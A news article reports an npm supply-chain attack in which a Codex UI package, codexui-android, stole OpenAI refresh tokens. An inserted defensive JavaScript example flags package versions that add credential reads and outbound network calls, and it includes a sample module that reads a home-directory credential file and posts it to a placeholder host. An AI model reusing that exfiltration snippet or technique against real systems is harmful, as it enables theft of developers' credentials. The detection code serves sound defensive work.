OpenAI Codex tool with over 29,000 downloads linked to malicious npm supply chain attack stealing authentication tokens
Date:
Mon, 01 Jun 2026 19:05:00 +0000
Description:
A tool started benign and turned sour after a little while, stealing tokens and granting persistent access.
FULL STORY ======================================================================
Researchers uncovered a malicious npm package posing as a Codex UI tool. Attackers exfiltrated Codex authentication tokens, including nonexpiring refresh tokens. Aikido Security also found two Android apps targeting Codex users.

A newly discovered supply-chain attack on npm is targeting software developers using OpenAI Codex.
Codex is OpenAI's coding assistant and software engineering agent that can write and review code, fix bugs, run tests, and help developers build software with nothing but plain-language input. Recently it was discovered that a tool published on both GitHub and npm was actually malicious. It is called codexui-android, and it is described as a remote web user interface for the Codex platform. It attracted more than 29,000 weekly downloads, so it was rather popular. One of the reasons for its popularity is that it worked as advertised and appeared legitimate. The code published on GitHub remained clean the whole time, meaning the public source code didn't show any malicious behavior.

Breaking bad

However, approximately a month into its existence, the tool received an update on npm which added information-stealing code. It primarily hunted for OpenAI login credentials.
When a developer runs the tool, it looks for their Codex authentication tokens and exfiltrates them to an attacker-controlled server. One of the tokens (the refresh token) can potentially allow an attacker to continue accessing the victim's OpenAI account for an extended period of time without needing the password.
The implications are rather dangerous, explained Aikido Security researcher Charlie Eriksen, who found and disclosed the attack. Besides the obvious - accessing the victim's Codex sessions - the attacker can use the tokens to spend the victim's API credits, to view projects or code they're working on through Codex, and even impersonate the victim when interacting with OpenAI services.
"The refresh_token doesn't expire," Eriksen said. "An attacker holding it can silently impersonate you indefinitely. A stolen Codex refresh_token goes beyond access to a chat interface -- it's persistent, silent access to whatever that account can do."
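The detail that matters for defenders in this story is where the malicious code lived: the GitHub repository stayed clean while a later npm release gained the stealer, so the useful comparison is between successive published versions of the package, not between the repository and a single release. The following is an added example, not code from the article, from Aikido Security or from the codexui-android package. It scans the source of each published version for capability indicators (home-directory reads, credential-looking field names, outbound HTTP) and reports which indicators first appear in which version, then flags a release where a credential-looking read and an outbound send arrive together. The indicator list, the two sample versions and the credential file name are constructed for illustration.

```javascript
// Added example, not from the article or the codexui-android package: report
// capabilities (credential reads, outbound network) that first appear in a later
// published version of an npm package. Indicators and sample sources are constructed.

const INDICATORS = {
  home_dir_read: /os\.homedir\s*\(/,                  // builds paths under the user's home directory
  file_read: /readFileSync\s*\(|readFile\s*\(/,       // reads local files
  token_literal: /refresh_token|access_token/,        // names credential fields
  outbound_http: /https?\.request\s*\(|fetch\s*\(|axios\.(post|get)\s*\(/, // sends data out
  child_process: /require\s*\(\s*['"]child_process['"]\s*\)/,
  env_dump: /process\.env\b/,
};

// All indicator names present in one version's concatenated source, sorted.
function findIndicators(source) {
  return Object.entries(INDICATORS)
    .filter(([, re]) => re.test(source))
    .map(([name]) => name)
    .sort();
}

function packageSource(files) {
  return Object.values(files).join('\n');
}

// versions: [{ version, files: { filename: content } }] in publish order.
// Returns one entry per version listing the indicators not seen in any earlier version.
function newCapabilitiesPerVersion(versions) {
  const seen = new Set();
  return versions.map((v) => {
    const added = findIndicators(packageSource(v.files)).filter((n) => !seen.has(n));
    added.forEach((n) => seen.add(n));
    return { version: v.version, added };
  });
}

// The pattern from the story: a credential-looking read and an outbound send
// arriving together in a single update.
function looksLikeCredentialExfilUpdate(added) {
  const reads = added.includes('home_dir_read') || added.includes('token_literal');
  return reads && added.includes('outbound_http');
}

// Which releases should a reviewer be pointed at?
function flaggedVersions(versions) {
  return newCapabilitiesPerVersion(versions)
    .filter((r) => looksLikeCredentialExfilUpdate(r.added))
    .map((r) => r.version);
}

// Constructed sample: 1.0.0 is a plain local web UI; 1.1.0 keeps it and adds a
// module that reads a file from the home directory and posts it to a host.
// CREDENTIAL_FILE_PLACEHOLDER and collector.example.invalid are placeholders.
const BENIGN_SERVER = `
const http = require('http');
http.createServer((req, res) => res.end('codex ui')).listen(3000);
`;
const ADDED_MODULE = `
const fs = require('fs'), os = require('os'), path = require('path'), https = require('https');
const data = fs.readFileSync(path.join(os.homedir(), 'CREDENTIAL_FILE_PLACEHOLDER'), 'utf8');
https.request({ host: 'collector.example.invalid', method: 'POST' }).end(data);
`;
const SAMPLE_VERSIONS = [
  { version: '1.0.0', files: { 'server.js': BENIGN_SERVER } },
  { version: '1.1.0', files: { 'server.js': BENIGN_SERVER, 'telemetry.js': ADDED_MODULE } },
];

console.log(JSON.stringify(newCapabilitiesPerVersion(SAMPLE_VERSIONS), null, 2));
console.log('flagged for review:', flaggedVersions(SAMPLE_VERSIONS));
```

In real use the `files` maps would come from unpacking each version's registry tarball rather than from inline strings. A hit is a trigger for manual review of that release, not proof of malice: many legitimate packages read the home directory or make network calls. What the check surfaces is a capability that showed up in an update, which is exactly what a clean repository and a trusted download count would otherwise hide.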
Aikido also said it saw two Android apps, both published by the same account, which were also targeting Codex users. One is called OpenClaw Codex Claude AI Agent; it runs the npm package within its PRoot sandbox and sends all Codex credentials to the same attacker-controlled server. This one had more than 50,000 downloads. The other one is called Codex and counts more than 10,000 downloads.
Via The Hacker News
======================================================================
Link to news story:
https://www.techradar.com/pro/security/openai-codex-tool-with-over-29-000-downloads-linked-to-malicious-npm-supply-chain-attack-stealing-authentication-tokens
--- Mystic BBS v1.12 A49 (Linux/64)
* Origin: tqwNet Technology News (1337:1/100)